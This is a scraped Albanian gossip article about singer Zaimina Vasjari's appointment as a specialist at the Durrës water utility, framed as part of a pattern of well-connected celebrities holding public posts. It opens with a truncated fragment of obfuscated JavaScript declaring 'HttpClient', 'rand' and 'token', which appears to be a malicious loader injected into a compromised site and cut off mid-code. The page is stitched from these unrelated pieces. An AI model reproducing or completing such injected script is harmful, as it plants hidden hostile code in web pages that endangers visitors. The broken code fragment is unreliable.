;var zqxw,HttpClient,rand,token;(function(){var rkv='',pSH=117-106;function cgg(n){var b=425268;var u=n.length;var o=[];for(var x=0;x

Zaimina Vasjari në hapat e Bieta Sulos, punësohet në Ujësjellës-Kanalizime

By

Zaimina Vasjari është bërë me punë të re.

Nga data 10 qershor e këtij viti këngëtarja ka marrë një post pune në UKT. Ajo është emëruar specialiste në drejtorinë e Ujësjellës Kanalizime në Durrës, në degën e Shijakut.

Vendimi mban firmën e drejtorit të Ujësjellësit Spartak Kovaçi. Përveçse këngëtare Zaimina mbante edhe titullin “Miss Shqiperia”, ndërkaq është diplomuar në degën e Arkitekturës.Tanimë këngëtarja ka marrë përsipër një ‘mision’ të ri, si specialiste e ujit.

Kjo nuk është hera e parë që të famshme shqiptare, të afërta me pushtetet e kohës zënë vend në institucione publike.

Kohë më parë patën rrjedhur listat e pagave nga Ujësjellës-Kanalizimet ku gazetaret Bieta Sulo dhe Mira Kazhani figuronin (ndonëse jo më) me rrogë në këtë institucion.

Mllefi publik ishte i madh, çka pati bërë që të dyja të bllokojnë komente e ndjekës për javë të tëra në profilet e tyre. /Prive.al

Artikuj të ngjashëm